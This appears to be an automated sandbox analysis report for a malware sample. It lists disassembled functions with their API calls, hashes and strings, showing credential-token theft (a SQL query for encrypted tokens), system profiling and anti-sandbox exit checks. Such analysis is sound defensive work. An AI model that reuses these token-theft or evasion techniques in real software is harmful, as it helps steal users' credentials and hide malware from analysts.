                                                                                                                                                                                                                                                                                        • Instruction ID: ba4a912f34a6ab240f03399ec897c117189ceb9282cc0eaf369c81769a73d46f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58fa82f264080733bae1e7b8f01e14ae4a67fe3ffc4adbed189253538e0755ae
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35513DB0D003189BDB24EF51DC45BEEBB75AB48309F5041AEE11966281DB386BC9CF58
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B44D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                                                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040B47B
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B553
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0040B567
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                                                                                                                                                                                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                                                        • API String ID: 2910778473-1079375795
                                                                                                                                                                                                                                                                                        • Opcode ID: c3e420af064c0a708796640bde459702700c5fd34751eff28f339fbe0379e7de
                                                                                                                                                                                                                                                                                        • Instruction ID: df2f8e8a8ca21c55da42a3c6f19f5118b3684059388f817d0631ea5bb79e5354
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3e420af064c0a708796640bde459702700c5fd34751eff28f339fbe0379e7de
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07A164759102089BCF14FBA1DC52EEE7739BF54308F51416EF506B2191EF38AA85CBA8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                                                                                                                                                                                                        • wsprintfA.USER32 ref: 00414BF6
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,04406430,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(00000000,044063B8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                                                                                                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 00414DA5
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %s\%s
                                                                                                                                                                                                                                                                                        • API String ID: 3896182533-4073750446
                                                                                                                                                                                                                                                                                        • Opcode ID: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
                                                                                                                                                                                                                                                                                        • Instruction ID: d244d91c33a18a5b0a6d9a0a642cdc181f43283702d6765b4fd500d7f5e12fa2
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 531daa6300200cb92d5b1988fc21d9558b480b48c1d4f7758da1487724698403
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59213875A0021CABDB64CB50DC85FE973B9BF88300F0085D9A649A6180DF74AAC6CFE4
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00411DA5
                                                                                                                                                                                                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,04406918,00000000,00020119,?), ref: 00411DC4
                                                                                                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,04408108,00000000,00000000,00000000,000000FF), ref: 00411DE8
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00411DF2
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00411E17
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,044080D8), ref: 00411E2B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2623679115-0
                                                                                                                                                                                                                                                                                        • Opcode ID: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                                                                        • Instruction ID: 8aed71b150b2ed53c6c52757a29982c6d8c6785b9d22af2673d92710ece34b21
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bf11c5f64fb992b3c772fe614ac28ac6fc491ab679ab64900ab2a626250608f3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F641B4B2900108BBCB15EBE0DC86FEE733EAB88745F00454DF71A5A191EE7467848BE1
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,04407710,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                                                                                                                                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                                                                                                                                                                                                        • String ID: X@
                                                                                                                                                                                                                                                                                        • API String ID: 3258613111-2850556465
                                                                                                                                                                                                                                                                                        • Opcode ID: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
                                                                                                                                                                                                                                                                                        • Instruction ID: 70962d3f4e1e977daa55f2855abdfba287f36735b870bb76fdd61a7d9847a281
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cd8ce6d40e5afa3ebb260d2b60027121d441955b8b015006d91c09b557981aa9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCD10376D101089ACB14FBA5DC91EEE7739BF14304F51825EF51672091EF38AA89CBB8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043EAC98), ref: 00415F11
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043EACB0), ref: 00415F2A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,044033B8), ref: 00415F42
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403370), ref: 00415F5A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,044032F8), ref: 00415F73
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04402B00), ref: 00415F8B
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043E7800), ref: 00415FA3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043E7660), ref: 00415FBC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403298), ref: 00415FD4
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403388), ref: 00415FEC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,044031D8), ref: 00416005
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403358), ref: 0041601D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,043E7920), ref: 00416035
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(75900000,04403430), ref: 0041604E
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                                                                                                                                                                                                          • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                                                                                                                                                                                                          • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                                                                                                                                                                                                          • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                                                                          • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                                                                          • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                                                                          • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                                                                          • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,044037A0,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                                                                          • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                                                                                                                                                                                                          • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,04402B50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                                                                                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,?,04402B50,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1175201934-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
                                                                                                                                                                                                                                                                                        • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 730e3f6f912575f9d2f5eb501aecbfb4f2d6af79dc721135fd94b85e33000efd
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,044066B8), ref: 0041244B
                                                                                                                                                                                                                                                                                          • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,00000000), ref: 00412471
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 00412490
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004124A4
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,043E5FD8), ref: 004124B7
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,?), ref: 004124CB
                                                                                                                                                                                                                                                                                        • lstrcat.KERNEL32(?,04406838), ref: 004124DF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                          • Part of subcall function 00415490: GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                                                                                                                                                                                                          • Part of subcall function 004121F0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
                                                                                                                                                                                                                                                                                          • Part of subcall function 004121F0: HeapAlloc.KERNEL32(00000000), ref: 00412207
                                                                                                                                                                                                                                                                                          • Part of subcall function 004121F0: wsprintfA.USER32 ref: 00412223
                                                                                                                                                                                                                                                                                          • Part of subcall function 004121F0: FindFirstFileA.KERNEL32(?,?), ref: 0041223A
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 167551676-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
                                                                                                                                                                                                                                                                                        • Instruction ID: 26a05e4f659b4c4b868bb0234a0ad995871bbc4a3af1f84cd303f322fad0653f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6103e27345c9a11c188d3e1fa81259371cccefca6cbec786149d127ceb43b465
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 083164B6900608A7CB20FBB0DC95EE9773DAB48704F40458EB3469A051EA7897C8CFD8
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 00401218
                                                                                                                                                                                                                                                                                        • __aulldiv.LIBCMT ref: 00401226
                                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00401254
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2429852227.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000447000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000549000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000624000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2429852227.0000000000636000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                                                        • API String ID: 3404098578-2766056989
                                                                                                                                                                                                                                                                                        • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                                                        • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C75C947
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C75C969
                                                                                                                                                                                                                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C75C9A9
                                                                                                                                                                                                                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C75C9C8
                                                                                                                                                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C75C9E2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2468184127.000000006C741000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C740000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468162713.000000006C740000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468246182.000000006C7BD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468271199.000000006C7CE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2468295787.000000006C7D2000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_6c740000_u3z0.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 4191843772-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ff6a4e2d4bd648d1e0519e5e05faac0e3fe705bc3137f3301c4d36b3d12e19c5
                                                                                                                                                                                                                                                                                        • Instruction ID: e237b3d2f3733e8c452f0589627fe10f3baa59e5c5315bcac129fe2396057b35
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff6a4e2d4bd648d1e0519e5e05faac0e3fe705bc3137f3301c4d36b3d12e19c5
